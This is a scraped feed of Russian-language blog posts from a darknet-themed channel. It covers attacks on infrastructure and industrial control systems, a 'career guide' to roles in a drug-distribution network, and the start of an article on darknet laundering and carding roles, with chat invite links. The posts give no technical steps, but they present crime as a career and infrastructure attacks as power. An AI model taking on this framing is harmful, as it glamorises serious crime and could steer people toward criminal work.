  &lt;figure id=&quot;JX3B&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e4/e2/e4e2b3d3-aa20-4472-91db-8e5aad63945c.jpeg&quot; width=&quot;3072&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;L1RB&quot;&gt;А как насчёт захвата контроля над городами, промышленными объектами и инфраструктурой, которые обеспечивают нашу повседневную жизнь? Взломы систем безопасности, управление умными зданиями, отключение электростанций и даже блокировка мостов — это уже не сценарий для фильмов, а реальность, которую мы сами можем создать. Весь мир становится одной большой сетью, и у неё всегда есть уязвимости.&lt;/p&gt;
  &lt;p id=&quot;sbvS&quot;&gt;Каждое здание, каждый мост, каждая фабрика или офис — это миниатюрная сеть, где каждое устройство связано друг с другом. Всё, от камер видеонаблюдения до систем контроля доступа, работает по своим правилам, но подчиняется общему принципу: «Всё подключено». А это значит, что стоит одному из элементов быть взломанным, как вся система становится твоей.&lt;/p&gt;
  &lt;ul id=&quot;0V9y&quot;&gt;
    &lt;li id=&quot;fH5M&quot;&gt;&lt;strong&gt;Системы контроля доступа:&lt;/strong&gt; они защищают двери, ворота, лифты и даже отдельные этажи. Имея доступ к этим системам, можно заблокировать входы или выйти на самые защищённые объекты без особого труда. RFID-карты и сканеры, которые должны быть надёжными, на деле часто оказываются примитивными и легко клонируются.&lt;/li&gt;
    &lt;li id=&quot;Qb1B&quot;&gt;&lt;strong&gt;Умные камеры — глаза, которые легко ослепить:&lt;/strong&gt; умные камеры обеспечивают наблюдение и безопасность, но они также могут быть использованы против системы. Взломанные камеры могут быть отключены, направлены не туда или даже использованы для слежки за людьми, которые верят, что остаются в безопасности.&lt;/li&gt;
    &lt;li id=&quot;GHbk&quot;&gt;&lt;strong&gt;Системы управления зданиями:&lt;/strong&gt; управление отоплением, вентиляцией, освещением — всё это завязано на ПО, которым можно манипулировать. Снял ограничение температуры, отключил вентиляцию — и вот здание больше не выполняет свои функции. Особенно опасно, когда речь идёт о критических объектах, вроде больниц или аэропортов.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;IRyt&quot;&gt;&lt;strong&gt;Промышленное оборудование: слабое звено в защищённых объектах&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;qCzt&quot;&gt;Промышленность строится на сложных системах автоматизации, которые были разработаны ещё до того, как кибербезопасность стала настоящей проблемой. Многие из этих систем даже не предполагают защиты от хакеров, потому что их создатели никогда не думали, что кто-то будет пытаться их взломать.&lt;/p&gt;
  &lt;ul id=&quot;Eg7H&quot;&gt;
    &lt;li id=&quot;yfA4&quot;&gt;&lt;strong&gt;SCADA и PLC-системы:&lt;/strong&gt; это мозг промышленного оборудования, управляющий всем, от насосов до энергетических сетей. Эти системы контролируют производство, транспортировку, переработку — и при этом часто оказываются открытыми для атак, потому что их защиту забыли обновить ещё в прошлом десятилетии.&lt;/li&gt;
    &lt;li id=&quot;AAmL&quot;&gt;&lt;strong&gt;Уязвимости в оборудовании:&lt;/strong&gt; многие из промышленных устройств работают на старом ПО, не имеют надёжной аутентификации и могут быть легко захвачены через сеть. Особенно опасны те объекты, которые подключены к интернету: никто не ожидает, что атаковать их можно с другого конца света.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;VKcR&quot;&gt;&lt;strong&gt;Взломы на грани катастрофы: кейсы атак на инфраструктуру&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;jd7s&quot;&gt;
    &lt;li id=&quot;BP2s&quot;&gt;&lt;strong&gt;BlackEnergy и атака на электросети Украины:&lt;/strong&gt; одна из самых известных атак на инфраструктуру, когда хакеры отключили электроснабжение целых городов. Они проникли в систему управления через уязвимости в ПО и, по сути, перевели выключатели в «выкл», оставив тысячи людей без света и тепла.&lt;/li&gt;
    &lt;li id=&quot;XTQQ&quot;&gt;&lt;strong&gt;Атака на водоочистительные станции США:&lt;/strong&gt; хакеры проникли в систему очистки воды, изменив уровень химических веществ, которые используются для дезинфекции. Несколько шагов влево или вправо — и вода могла стать ядовитой для тысяч людей. Всё, что требовалось, — доступ к старой системе через интернет и банальное знание логинов и паролей.&lt;/li&gt;
    &lt;li id=&quot;Mk25&quot;&gt;&lt;strong&gt;Stuxnet и удар по иранским центрифугам:&lt;/strong&gt; этот вирус стал знаменитым после того, как уничтожил часть иранской ядерной программы, атакуя центрифуги на уровне железа. Это не просто вирус, а настоящее оружие, специально созданное для разрушения инфраструктуры без единого выстрела.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;vz0t&quot;&gt;Атаки на инфраструктуру — это не просто игры. Это способ показать, что мир, построенный на технологиях, может рухнуть, если кто-то захочет его подвинуть. Взлом электростанций, промышленных объектов и систем управления — это уже не про деньги. Это про власть.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;hVcm&quot;&gt;Наш канал: &lt;a href=&quot;https://t.me/+eATHVyrDVPUwYzk8&quot; target=&quot;_blank&quot;&gt;https://t.me/+eATHVyrDVPUwYzk8&lt;/a&gt;&lt;br /&gt;Наш чат: &lt;a href=&quot;https://t.me/+hDPQsUT7YEljNzc8&quot; target=&quot;_blank&quot;&gt;https://t.me/+hDPQsUT7YEljNzc8&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>parabellum_clan:sVJke01Tsnt</id><link rel="alternate" type="text/html" href="https://teletype.in/@parabellum_clan/sVJke01Tsnt?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=parabellum_clan"></link><title>Карьерные пути теневой паутины Ч.4</title><published>2025-06-17T09:25:55.834Z</published><updated>2025-06-17T09:25:55.834Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img3.teletype.in/files/6a/fc/6afc7c8d-6aaa-4908-a68c-71b6ba420842.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://telegra.ph/file/98b82bc8b709537e4e6f5.png&quot;&gt;Доброго дня, дамы и господа, с вами Parabellum Clan. Это 3-я статья цикла о профессиях даркнета и здесь мы решили разобрать профессии, которые связаны связаны с весьма неприятной нам темой, а именно наркотики.</summary><content type="html">
  &lt;figure id=&quot;WgJx&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/98b82bc8b709537e4e6f5.png&quot; width=&quot;1500&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;PYCH&quot;&gt;Доброго дня, дамы и господа, с вами &lt;a href=&quot;https://t.me/+rsXkVug4O0IyZjZk&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Parabellum Clan&lt;/strong&gt;&lt;/a&gt;. Это 3-я статья цикла о профессиях даркнета и здесь мы решили разобрать профессии, которые связаны связаны с весьма неприятной нам темой, а именно наркотики.&lt;/p&gt;
  &lt;p id=&quot;KYlH&quot;&gt;&lt;strong&gt;Содержание:&lt;/strong&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/ccS6Q_HLYMw#1.-%25D0%25A0%25D0%25BE%25D0%25BB%25D1%258C-%25D0%25BD%25D0%25B0%25D1%2580%25D0%25BA%25D0%25BE-%25D1%2581%25D0%25B5%25D0%25BA%25D1%2582%25D0%25BE%25D1%2580%25D0%25B0-%25D0%25B2-%25D0%25B4%25D0%25B0%25D1%2580%25D0%25BA%25D0%25BD%25D0%25B5%25D1%2582%25D0%25B5&quot;&gt; 1. Роль нарко-сектора в даркнете&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/ccS6Q_HLYMw#2.-%25D0%259A%25D0%25BB%25D0%25B0%25D0%25B4%25D0%25BC%25D0%25B5%25D0%25BD&quot;&gt; 2. Кладмен&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/ccS6Q_HLYMw#3.-%25D0%259A%25D0%25BB%25D0%25B0%25D0%25B4%25D0%25BE%25D0%25B2%25D1%2589%25D0%25B8%25D0%25BA&quot;&gt; 3. Кладовщик&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/ccS6Q_HLYMw#4.-%25D0%259A%25D1%2583%25D1%2580%25D0%25B0%25D1%2582%25D0%25BE%25D1%2580&quot;&gt; 4. Куратор&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/ccS6Q_HLYMw#5.-%25D0%259E%25D0%25BF%25D0%25B5%25D1%2580%25D0%25B0%25D1%2582%25D0%25BE%25D1%2580&quot;&gt; 5. Оператор&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/ccS6Q_HLYMw#6.-%25D0%259D%25D0%25B0%25D1%2580%25D0%25BA%25D0%25BE%25D0%25B1%25D0%25B0%25D1%2580%25D0%25BE%25D0%25BD&quot;&gt; 6. Наркобарон&lt;/a&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;CraH&quot;&gt;АДМИНИСТРАЦИЯ ДАННОГО КАНАЛА КАТЕГОРИЧЕСКИ ПРОТИВ УПОТРЕБЛЕНИЯ, ИЗГОТОВЛЕНИЯ И РАССПРОСТРАНЕНИЯ ПСИХОАКТИВНЫХ ВЕЩЕСТВ&lt;/p&gt;
  &lt;hr /&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;1.-Роль-нарко-сектора-в-даркнете&quot; data-align=&quot;center&quot;&gt;1. Роль нарко-сектора в даркнете&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;tbwj&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/5d952e5d0b7e7bf11e8b6.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;NYYp&quot;&gt;Даркнет часто воспринимается как пространство, которое рука об руку идёт с наркоторговлей. Это создает стереотип, что весь даркнет — это только преступный нарко-рынок, что затмевает его другие, менее негативные аспекты, такие как свобода слова и защита конфиденциальности.&lt;/p&gt;
  &lt;p id=&quot;5vzw&quot;&gt;По оценкам экспертов, нарко-сектор составляет значительную часть экономики даркнета. &lt;em&gt;&lt;u&gt;Исследования показывают, что продажи наркотиков могут составлять от 30% до 50% от общего объема транзакций в этом сегменте.&lt;/u&gt;&lt;/em&gt; Суммарные доходы от торговли наркотиками в даркнете оцениваются в миллиарды долларов ежегодно, а сами наркотики являются чуть ли не самым ходовым товаром в дарке.&lt;/p&gt;
  &lt;p id=&quot;kU2B&quot;&gt;Экономика нарко-сектора в даркнете организована по цепочке поставок, которая включает &lt;strong&gt;несколько ключевых этапов&lt;/strong&gt;:&lt;/p&gt;
  &lt;p id=&quot;dxTB&quot;&gt;1. &lt;strong&gt;Производство: &lt;/strong&gt;Наркотики производятся в подпольных лабораториях или на плантациях. Это могут быть как синтетические наркотики (например, метамфетамин), так и растительные (например, марихуана).&lt;/p&gt;
  &lt;p id=&quot;wsQ9&quot;&gt;2. &lt;strong&gt;Торговля: &lt;/strong&gt;Продавцы используют платформы даркнета для создания анонимных магазинов. На таких платформах, как Silk Road (закрыт в 2013 году), AlphaBay и Dream Market, продавцы могут выставлять свои товары на продажу.&lt;/p&gt;
  &lt;p id=&quot;kyDs&quot;&gt;3. &lt;strong&gt;Оплата:&lt;/strong&gt; Транзакции обычно проводятся с использованием криптовалют, таких как Bitcoin или Monero, что обеспечивает дополнительный уровень анонимности.&lt;/p&gt;
  &lt;p id=&quot;67Gv&quot;&gt;4. &lt;strong&gt;Доставка:&lt;/strong&gt; Наркотики доставляются покупателям через почтовые службы или с помощью курьеров. Используются различные методы маскировки, чтобы избежать обнаружения.&lt;/p&gt;
  &lt;p id=&quot;CWNE&quot;&gt;5. &lt;strong&gt;Обратная связь и репутация:&lt;/strong&gt; Важным аспектом является система отзывов, где покупатели могут оставлять отзывы о качестве продукции и надежности продавца.&lt;/p&gt;
  &lt;p id=&quot;J9hS&quot;&gt;За каждый из этих этапов сейчас отвечаю разные люди, наркорынок уже вырос с тех времён, когда 2-3 человека выполняли все эти функции, и успешно перешёл к раздельному труду, где каждое из звеньев цепочки не контактирует с вышестоящим. Так давайте же сейчас разберём эти звенья по профессиям.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;2.-Кладмен&quot; data-align=&quot;center&quot;&gt;2. Кладмен&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;HIKG&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/1d8d0b18935770dd298fd.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;BMtM&quot;&gt;&lt;strong&gt;Описание: &lt;/strong&gt;это человек, занимающийся распространением наркотиков через закладки. В даркнете он выступает как связующее звено между продавцами и покупателями, обеспечивая доставку товара. Основная задача кладмена — найти безопасное место для закладки наркотиков и передать покупателю информацию о его местонахождении после получения оплаты.&lt;/p&gt;
  &lt;p id=&quot;Yqlh&quot;&gt;&lt;strong&gt;Требования: &lt;/strong&gt;отсутствие мозга ;)&lt;/p&gt;
  &lt;p id=&quot;Yz22&quot;&gt;&lt;strong&gt;Перспективы роста:&lt;/strong&gt; обычно кладмены живут на свободе не дольше 2-х месяцев из-за чего их рост практически невозможен, но постепенно опытным кладменам могут доверить мастерклады или уйти на пенсию в должность куратора для новых кладменов.&lt;/p&gt;
  &lt;p id=&quot;T4fF&quot;&gt;&lt;strong&gt;Наказание:&lt;/strong&gt; Статья 228 УК РФ (Незаконные приобретение, хранение, перевозка, изготовление, переработка наркотических средств)&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;3.-Кладовщик&quot; data-align=&quot;center&quot;&gt;3. Кладовщик&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;2I9t&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/0695365acfd2afafef9e1.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;gaei&quot;&gt;&lt;strong&gt;Описание: &lt;/strong&gt;играет ключевую роль в управлении запасами наркотических средств. Его основная задача заключается в обеспечении безопасности и сохранности товара, который может включать различные виды наркотиков. Кладовщик отвечает за прием, учет и хранение партий наркотиков, поступающих от поставщиков или производственных лабораторий. Он должен следить за тем, чтобы товар был надежно упакован и спрятан в безопасных местах, таких как тайники или специально оборудованные помещения. Кроме того, кладовщик координирует перемещение товара по указанию вышестоящих лиц, таких как кураторы или операторы.&lt;/p&gt;
  &lt;p id=&quot;U0Nb&quot;&gt;&lt;strong&gt;Требования:&lt;/strong&gt; высокий уровень доверия со стороны организаторов сети, так как кладовщик имеет доступ к крупным партиям товара, способность вести точный учет и контролировать запасы, строгое соблюдение инструкций и правил безопасности.&lt;/p&gt;
  &lt;p id=&quot;Z2xG&quot;&gt;&lt;strong&gt;Перспективы роста: &lt;/strong&gt;при исправной и отличной работе кладовщик может быть передвинут на более безопасную роль куратора или оператора.&lt;/p&gt;
  &lt;p id=&quot;i6bI&quot;&gt;&lt;strong&gt;Наказание:&lt;/strong&gt; Статья 228 УК РФ (Незаконные приобретение, хранение, перевозка, изготовление, переработка наркотических средств)&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;4.-Куратор&quot; data-align=&quot;center&quot;&gt;4. Куратор&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;7h9R&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/10/1f/101f3717-90aa-4f70-b734-0cc6cfc52ba0.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;FDZ3&quot;&gt;&lt;strong&gt;Описание: &lt;/strong&gt;в контексте наркосети играет важную роль в управлении и координации операций, связанных с распространением наркотиков. Основная задача куратора заключается в организации работы группы кладменов и кладовщиков, которые непосредственно занимаются хранением и распределением товара. Куратор отвечает за планирование маршрутов, определение мест закладок и контроль за выполнением задач подчиненными. Он также может быть ответственным за связь с поставщиками и операторами, обеспечивая бесперебойное снабжение сети наркотиками.&lt;/p&gt;
  &lt;p id=&quot;aq8Z&quot;&gt;&lt;strong&gt;Требования:&lt;/strong&gt; способность эффективно управлять командой и мотивировать подчиненных, умение планировать и координировать сложные операции, способность поддерживать связь с различными участниками сети, высокий уровень доверия со стороны руководства сети, так как куратор имеет доступ к важной информации и ресурсам.&lt;/p&gt;
  &lt;p id=&quot;fOgU&quot;&gt;&lt;strong&gt;Перспективы роста: &lt;/strong&gt;при исправной и отличной работе куратор может быть передвинут на роль оператора (по желанию), опытный куратор может создать собственную сеть или перейти в высшие слои управления сетью.&lt;/p&gt;
  &lt;p id=&quot;Th2V&quot;&gt;&lt;strong&gt;Наказание:&lt;/strong&gt; Статья 228 УК РФ (Незаконные приобретение, хранение, перевозка, изготовление, переработка наркотических средств), Статья 210 УК РФ (Организация преступного сообщества (преступной организации) или участие в нем).&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;5.-Оператор&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;5. Оператор&lt;/strong&gt;&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;dIRF&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/0b/d7/0bd7a819-b62b-4148-9eb9-3529e9a53ec4.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;2NDV&quot;&gt;&lt;strong&gt;Описание:&lt;/strong&gt; это ключевая фигура взаимодействия с клиентами, отвечающая за координацию и управление всеми аспектами логистической и финансовой деятельности сети. Оператор занимается стратегическим планированием, управляет потоками товаров и денежных средств, а также обеспечивает связь между различными уровнями организации. Он может взаимодействовать с кураторами, поставщиками и другими операторами, чтобы гарантировать бесперебойную работу сети. Оператор также отвечает за анализ рынка и разработку новых стратегий для увеличения прибыли и привлечения клиентов.&lt;/p&gt;
  &lt;p id=&quot;0puF&quot;&gt;&lt;strong&gt;Требования:&lt;/strong&gt; способность разрабатывать долгосрочные планы и адаптироваться к изменениям в общественных настроениях, опыт в управлении большими командами и проектами, умение управлять бюджетами, анализировать финансовые потоки и оптимизировать расходы.&lt;/p&gt;
  &lt;p id=&quot;u6fo&quot;&gt;&lt;strong&gt;Перспективы роста: &lt;/strong&gt;при исправной и отличной работе оператор может выйти на международное сотрудничество и работу с крупными партиями, а в далёкой перспективе открыть свой сервис, но это удаётся единицам.&lt;/p&gt;
  &lt;p id=&quot;86Wo&quot;&gt;&lt;strong&gt;Наказание:&lt;/strong&gt; Статья 210 УК РФ (Организация преступного сообщества (преступной организации) или участие в нем), Статья 174 УК РФ (Легализация (отмывание) денежных средств или иного имущества, приобретенных преступным путем)&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;6.-Наркобарон&quot; data-align=&quot;center&quot;&gt;6. Наркобарон&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;uLef&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a6/c3/a6c39192-396a-433d-b35a-7a41b780f63d.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;0fWn&quot;&gt;&lt;strong&gt;Описание:&lt;/strong&gt; это высшая должность в иерархии наркосети, представляющая собой лидера, который контролирует все аспекты деятельности организации. Наркобарон отвечает за стратегическое планирование, управление ресурсами и принятие ключевых решений, влияющих на всю сеть. Он устанавливает связи с международными поставщиками и другими крупными игроками на рынке, обеспечивая стабильные поставки и расширение территории влияния. Наркобарон также занимается распределением прибыли, управлением рисками и защитой организации от правоохранительных органов.&lt;/p&gt;
  &lt;p id=&quot;Rjja&quot;&gt;&lt;strong&gt;Требования: д&lt;/strong&gt;ля того чтобы стать наркобароном, необходимо обладать выдающимися лидерскими качествами, стратегическим мышлением и обширными связями в криминальном мире. Лидерские качества включают умение вдохновлять и управлять большими командами, а также принимать трудные решения в стрессовых ситуациях. Стратегическое мышление позволяет разрабатывать долгосрочные планы и адаптироваться к изменениям на рынке. Обширные связи в криминальном мире необходимы для установления партнерств и обеспечения безопасности сети.&lt;/p&gt;
  &lt;p id=&quot;aLq7&quot;&gt;&lt;strong&gt;Перспективы роста: &lt;/strong&gt;укрепление своего влияния на международной арене, расширение сети за счет новых территорий и рынков, а также диверсификацию бизнеса путем инвестирования в легальные предприятия.&lt;/p&gt;
  &lt;p id=&quot;4efT&quot;&gt;&lt;strong&gt;Наказание:&lt;/strong&gt; Статья 210 УК РФ (Организация преступного сообщества (преступной организации) или участие в нем), Статья 174 УК РФ (Легализация (отмывание) денежных средств или иного имущества, приобретенных преступным путем), Статья 228 УК РФ (Незаконные приобретение, хранение, перевозка, изготовление, переработка наркотических средств)&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;8OXK&quot;&gt;&lt;em&gt;Это, понятное дело, не все должность в наркоцепи, но мы ограничимся этим.Всем удачи, ещё увидимся в скором времени, а пока что это конец нашего цикла о профессиях даркнета.&lt;/em&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;1ibJ&quot;&gt;Наш канал: &lt;a href=&quot;https://t.me/+eATHVyrDVPUwYzk8&quot; target=&quot;_blank&quot;&gt;https://t.me/+eATHVyrDVPUwYzk8&lt;/a&gt;&lt;br /&gt;Наш чат: &lt;a href=&quot;https://t.me/+hDPQsUT7YEljNzc8&quot; target=&quot;_blank&quot;&gt;https://t.me/+hDPQsUT7YEljNzc8&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>parabellum_clan:darknet_career_part3</id><link rel="alternate" type="text/html" href="https://teletype.in/@parabellum_clan/darknet_career_part3?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=parabellum_clan"></link><title>Карьерные пути теневой паутины Ч.3</title><published>2025-06-17T09:24:02.335Z</published><updated>2025-06-17T09:24:02.335Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img3.teletype.in/files/6a/fc/6afc7c8d-6aaa-4908-a68c-71b6ba420842.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://telegra.ph/file/6cc71e5c5ca2e881fa419.png&quot;&gt;Доброго дня, дамы и господа, с вами Parabellum Clan. Что же может быть важнее денег? Вы же для этого залезли в даркнет, правильно? Это 3-я статья цикла о профессиях даркнета и здесь мы решили разобрать профессии, которые связаны всецело и полностью с финансовым сектором. Если у вас возникают какие-то вопросы, вы всегда можешь спросить в нашем уютном чате тех, кто сейчас работает в этих направлениях.</summary><content type="html">
  &lt;figure id=&quot;vb8G&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/6cc71e5c5ca2e881fa419.png&quot; width=&quot;1500&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;SJkb&quot;&gt;Доброго дня, дамы и господа, с вами &lt;a href=&quot;https://t.me/+rsXkVug4O0IyZjZk&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Parabellum Clan&lt;/strong&gt;&lt;/a&gt;. Что же может быть важнее денег? Вы же для этого залезли в даркнет, правильно? Это 3-я статья цикла о профессиях даркнета и здесь мы решили разобрать профессии, которые связаны всецело и полностью с финансовым сектором. Если у вас возникают какие-то вопросы, вы всегда можешь спросить &lt;a href=&quot;https://t.me/+kZbasZ-d4hk2MDFk&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;в нашем уютном чате&lt;/u&gt;&lt;/a&gt; тех, кто сейчас работает в этих направлениях.&lt;/p&gt;
  &lt;p id=&quot;ITgD&quot;&gt;&lt;strong&gt;Содержание:&lt;/strong&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/WxdTMJQPuTf#1.-%25D0%259A%25D1%2580%25D1%2583%25D0%25B3%25D0%25BE%25D0%25B2%25D0%25BE%25D1%2580%25D0%25BE%25D1%2582-%25D0%25B4%25D0%25B5%25D0%25BD%25D0%25B5%25D0%25B3-%25D0%25B2-%25D0%25B4%25D0%25B0%25D1%2580%25D0%25BA%25D0%25BD%25D0%25B5%25D1%2582%25D0%25B5&quot;&gt; 1. Круговорот денег в даркнете&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/WxdTMJQPuTf#2.-%25D0%259A%25D0%25B0%25D1%2580%25D0%25B4%25D0%25B5%25D1%2580&quot;&gt; 2. Кардер&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/WxdTMJQPuTf#3.-%25D0%259E%25D0%25B1%25D0%25BD%25D0%25B0%25D0%25BB%25D1%258C%25D1%2589%25D0%25B8%25D0%25BA&quot;&gt; 3. Обнальщик&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/WxdTMJQPuTf#4.-%25D0%2594%25D1%2580%25D0%25BE%25D0%25BF&quot;&gt; 4. Дроп&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/WxdTMJQPuTf#5.-%25D0%2593%25D0%25B0%25D1%2580%25D0%25B0%25D0%25BD%25D1%2582&quot;&gt; 5. Гарант&lt;/a&gt;&lt;br /&gt; &lt;a href=&quot;https://telegra.ph/Karernye-puti-tenevoj-pautiny-CH2-08-22#6.-%D0%90%D1%80%D0%B1%D0%B8%D1%82%D1%80&quot; target=&quot;_blank&quot;&gt;6. Арбитр&lt;/a&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;1.-Круговорот-денег-в-даркнете&quot; data-align=&quot;center&quot;&gt;1. Круговорот денег в даркнете&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;KbFI&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/e68e54f12599731db9c34.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;44Xr&quot;&gt;Финансовый сектор даркнета представляет собой сложную и многоуровневую экосистему, в которой осуществляется обмен, хранение и отмывание денег, полученных незаконным путем. Вот основные компоненты и механизмы, которые его составляют:&lt;/p&gt;
  &lt;p id=&quot;l0MM&quot;&gt;&lt;strong&gt; 1. Криптовалюты&lt;/strong&gt;&lt;br /&gt;Криптовалюты, такие как Bitcoin, Monero и другие, играют ключевую роль в финансовом секторе даркнета. Они обеспечивают анонимность и децентрализацию, что делает их идеальными для использования в незаконных сделках. &lt;br /&gt;&lt;em&gt;- Bitcoin:&lt;/em&gt; Используется широко, но не полностью анонимен, так как транзакции можно отслеживать.&lt;br /&gt;&lt;em&gt;- Monero:&lt;/em&gt; Предлагает более высокий уровень анонимности благодаря использованию технологий скрытых адресов и кольцевых подписей.&lt;/p&gt;
  &lt;p id=&quot;wflD&quot;&gt;&lt;strong&gt;2. Обменники&lt;/strong&gt;&lt;br /&gt;Существуют специализированные обменники, которые позволяют пользователям обменивать фиатные деньги на криптовалюту и наоборот. Эти обменники часто работают с минимальными требованиями к идентификации и могут принимать наличные или другие анонимные способы оплаты.&lt;/p&gt;
  &lt;p id=&quot;LZWA&quot;&gt;&lt;strong&gt;3. Миксеры &lt;/strong&gt;&lt;br /&gt;Миксеры используются для «отмывания» криптовалюты. Они смешивают средства от разных пользователей, чтобы затруднить отслеживание транзакций. Пользователи отправляют свои монеты в миксер, который затем отправляет обратно другие монеты, тем самым скрывая первоначальное происхождение средств.&lt;/p&gt;
  &lt;p id=&quot;UO9s&quot;&gt;&lt;strong&gt;4. Даркнет-маркеты&lt;/strong&gt;&lt;br /&gt;На даркнет-маркетах осуществляется продажа товаров и услуг, включая наркотики, оружие и украденные данные. Эти рынки принимают оплату только в криптовалюте и используют систему отзывов для создания репутации продавцов и покупателей.&lt;/p&gt;
  &lt;p id=&quot;HOPY&quot;&gt;&lt;strong&gt; 5. Кредиты и займы&lt;/strong&gt;&lt;br /&gt;Некоторые участники даркнета предлагают кредиты под высокие проценты, используя криптовалюту в качестве обеспечения. Это может быть рискованно как для заемщиков, так и для кредиторов.&lt;/p&gt;
  &lt;p id=&quot;6Rxx&quot;&gt;&lt;strong&gt;6. Отмывание денег&lt;/strong&gt;&lt;br /&gt;Отмывание средств в даркнете происходит через сложные схемы, включая использование подставных компаний, дропов и других методов для легализации незаконно полученных средств.&lt;/p&gt;
  &lt;p id=&quot;7F81&quot;&gt;&lt;strong&gt;7. Анонимные платежные системы&lt;/strong&gt;&lt;br /&gt;Существуют также анонимные платежные системы, которые позволяют пользователям отправлять и получать деньги без раскрытия своей личности. Эти системы могут использоваться для финансирования незаконной деятельности или для перевода средств между участниками.&lt;/p&gt;
  &lt;blockquote id=&quot;tmkJ&quot;&gt;Это всё, как мне кажется, вам понятно, но давайте подумаем, какое происхождение значительной части капитала даркнета? Может это обычный работяга решил курнуть травки и пополнил криптовалютные активы какого-то шопа своими кровно-заработанными, а может скамер выудил у мамонта данные или финансы напрямик, и хочет их отмыть, а может кто-то обналичивает банковские карты или личные кабинеты чужих банков, пытаясь присвоить себе их денежки. Всякое может быть, так давайте же рассмотрим, кто в основном втянут в этот процесс и способствует его продвижению.&lt;/blockquote&gt;
